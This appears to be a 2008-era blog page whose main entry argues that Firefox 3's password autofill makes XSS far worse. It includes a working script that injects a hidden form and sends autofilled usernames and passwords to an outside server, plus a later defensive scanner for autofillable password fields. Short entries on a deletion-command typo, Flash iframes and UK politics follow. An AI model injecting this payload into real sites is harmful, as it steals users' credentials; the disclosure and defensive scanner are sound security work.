Seen moments ago:
rm -rf /usr/lolcat/nginx
That's some serious typo skills - some part of my brain meant to write that. You know that bit in that show where that guy realises he's going insane? I'm that guy.
The Firefox developers have their security and usability priorities all muddled up. You can't access my self-signed website, but I can steal your passwords without you even knowing. And they think this makes your browser better.
In Firefox 3, they introduced stricter SSL certificate checks that give you an error page you can't turn off. It's a usability nightmare if it's a site you want to get into: there are 4 mouse clicks, scattered all over the screen, to add an exception for the site - amusingly, 5 if you only want to add it temporarily. Reminds me of Vista UAC. Extremely annoying for people who run several HTTPS sites on a dev machine, or who need to access scripts on specific machines behind a load-balanced secure site, for example.
Sacrificing usability for security is something I can forgive, even condone - although I can't see quite what's so bad about the way IE 7 does it, with a big warning saying "Actually, you don't want to open this". However, it's not a sacrifice Firefox wants to make across the board. Look at the password manager.
Just log in once, and whenever you open another page on the site that prompts for your username and password, it'll pre-populate it for you. Handy, eh?
I'm not talking about an autocomplete option when you start typing, like they do in IE; no, it fills it out for you as soon as you open the page. I thought this was new to FF3, but looking back they've been doing it in FF2 too.
Significant usability gain? No. In fact, they've "improved" form detection in FF3 and have made it a usability nightmare. Now it does it anywhere it finds a password field, regardless of context. Imagine a form on a site that prompts you for a password to a different resource; it's now always populated with the wrong password. Or more commonly, imagine a form that lets you change your details, and has a field to change your password if you provide your current one. Click save and *ding*! Error! Or even better, you've now got a blank password (and don't know why you can't log back in). Now they're sacrificing usability for usability!
Bugzilla comments say if you've got a form like that, you should set autocomplete="off" on the form (or on the password field itself). Great, but that's like saying they're now not going to render HTML if it contains presentational markup - I'm screwed on a major proportion of sites I use.
But wait, why am I talking about mere annoyances, when I can be talking about a vulnerability, at least when combined with XSS. Let me show you:
I LOVE THIS SITE, AAA+++++++=+++!!!1!
<script>
// Inject a hidden login form. Firefox's password manager will pre-populate
// it with the credentials it has stored for this site as soon as the page renders.
document.write('<form style="display:none">' +
'<input type="text" name="username" id="username">' +
'<input type="password" name="password"></form>');
// Once the page (and with it the autofill) has loaded, read the values back
// out and ship them to the attacker's server as an image request. The values
// are URL-encoded so a password containing & or # does not truncate the query.
window.onload = function () {
(new Image).src = 'http://radiac.net/capture?u=' +
encodeURIComponent(document.getElementsByName('username')[0].value) +
'&p=' + encodeURIComponent(document.getElementsByName('password')[0].value);
};
</script>
That's just the quick version before we start trying. And the best bit? There are bug reports about this in Bugzilla going back to 2006. The response to that bug was the same as to similar bugs being submitted now:
I don't think we should sacrifice usability this much just to slightly mitigate the effect of a successful XSS attack.
Slightly mitigate the effect? Slightly?! I just stole all your visitors' usernames and passwords!
Other comments say once a site's been injected with malicious code, it's already game over, but this isn't some obscure QuickTime hack that'll only last until the next bug fix - this is an officially sanctioned feature. With this, it doesn't matter if I can't inject code onto the login page to sniff keypresses, or if you do clever stuff with your session cookies to make sure they can't be copied - all I need is one tiny corner of your site, and I have their password. I am now them.
Still, at least they don't have to click two buttons to select their login from the dropdown. I'm sure that'll keep them happy while I'm finding out which other sites I can now access. Please, just let me get one for play.
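As an added example (not code from the original post, and nothing the Firefox developers shipped): since the only mitigation on offer is autocomplete="off", here is a small Node script that scans the HTML a site serves and reports every password field a browser password manager is free to pre-populate, honouring autocomplete="off" on the input itself or on its enclosing form. The function and variable names are my own, and the sample HTML is constructed for the example; it includes the hidden form the injected comment above leaves behind, which is exactly the kind of field that gets flagged.

```javascript
// Added example, not part of the original post. Pure string processing,
// so it runs under Node without a DOM. Function names are assumptions.

// name="value", name='value' or name=value inside a single tag.
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Parse the attributes of one tag such as <input type="password" ...>.
// Names and values are lower-cased so comparisons are case-insensitive.
function parseAttrs(tag) {
  const attrs = {};
  for (const m of tag.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = (m[2] ?? m[3] ?? m[4] ?? '').toLowerCase();
  }
  return attrs;
}

function autocompleteOff(attrs) {
  return attrs.autocomplete === 'off';
}

// Return one finding per password input that a password manager may
// pre-populate: no autocomplete="off" on the input and none on its form.
// `form` is the enclosing form's id or name, '(anonymous)' for a form with
// neither, and null for an input that sits outside any form.
function findAutofillablePasswordFields(html) {
  const findings = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  const inputRe = /<input\b[^>]*>/gi;

  const scan = (fragment, formAttrs) => {
    for (const tagMatch of fragment.matchAll(inputRe)) {
      const attrs = parseAttrs(tagMatch[0]);
      if (attrs.type !== 'password') continue;
      if (autocompleteOff(attrs) || (formAttrs && autocompleteOff(formAttrs))) continue;
      findings.push({
        name: attrs.name ?? null,
        form: formAttrs ? (formAttrs.id ?? formAttrs.name ?? '(anonymous)') : null,
      });
    }
  };

  let lastIndex = 0;
  for (const m of html.matchAll(formRe)) {
    scan(html.slice(lastIndex, m.index), null); // inputs between forms
    scan(m[2], parseAttrs(m[1]));               // inputs inside this form
    lastIndex = m.index + m[0].length;
  }
  scan(html.slice(lastIndex), null);            // inputs after the last form
  return findings;
}

// Constructed sample page: a normal login form, a change-details form that
// follows the Bugzilla advice per field, a form that opts out wholesale, and
// the hidden form left behind by the injected comment.
const SAMPLE_HTML = `
<form id="login" action="/login">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
<form id="profile" action="/profile">
  <input type="password" name="current_password" autocomplete="off">
  <input type="password" name="new_password" autocomplete="off">
</form>
<form id="checkout" autocomplete="off">
  <input type="password" name="card_pin">
</form>
<!-- what the injected comment leaves behind -->
<form style="display:none"><input type="text" name="username" id="username"><input type="password" name="password"></form>
`;

console.log(JSON.stringify(findAutofillablePasswordFields(SAMPLE_HTML), null, 2));
```

Run it with `node` and it lists two findings: the genuine login form (which you may well want to leave auto-fillable) and the anonymous hidden form, which is the tell-tale of the attack. Treat the output as a review aid rather than a fix: any password field it reports on a page that can also carry user-supplied HTML is one an injected script can read straight out of the DOM.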
Here's another fun little Flash/IE fact: putting a 1x1 SWF inside a 1x1 iframe fails in IE, at least if you want to use ExternalInterface. It seems that the iframe has to be 18px by 18px - and Google and I have no idea why. Any suggestions?
Has anyone else noticed how the RMT only ever strikes when it's sunny?
I don't regularly comment on matters of politics, but I shall today. For some reason I was surprised when I heard that the 42-day detention bill had passed in the Commons. Diane Abbott's speech is a perfect example of why it should have failed - you know something's up when a Labour MP stands with senior ministers from the Tories and Lib Dems in saying the security services don't need it, that similar legislation was already defeated two years ago and that it's just about strengthening the PM's position. I couldn't see how people could have listened to that and the rest of the debate, and still voted aye. I naively couldn't see how it would pass.
Of course, I missed the real point - it's pure politics at its worst. Brown wanted to show he was tough and able to succeed where Blair failed. If Brown had lost, he could have been days away from a challenge, and the rumours of promises of safe seats and knighthoods to increase the ayes don't do anything to suggest otherwise. Blair was dangerous, but Brown is both dangerous and incompetent. A heady mix.
So, while there may well be more to it than meets the eye, taking David Davis' resignation speech at face value gives me just the tiniest glimmer of hope that the madness in politics in this country hasn't reached the point of no return.
Of course, all his re-election will achieve is a bit of extra publicity and another nail in Brown's coffin, but no real change. That's the problem with politics in the UK - we the voters are damned if we do, damned if we don't.
But then perhaps I give too much credit to the public common sense. Top-watched video on the BBC is "Colleen parties before wedding" - they just don't care, because it doesn't affect them, yet.
Time to move out. Can anyone recommend a nice country that speaks english but respects their citizens?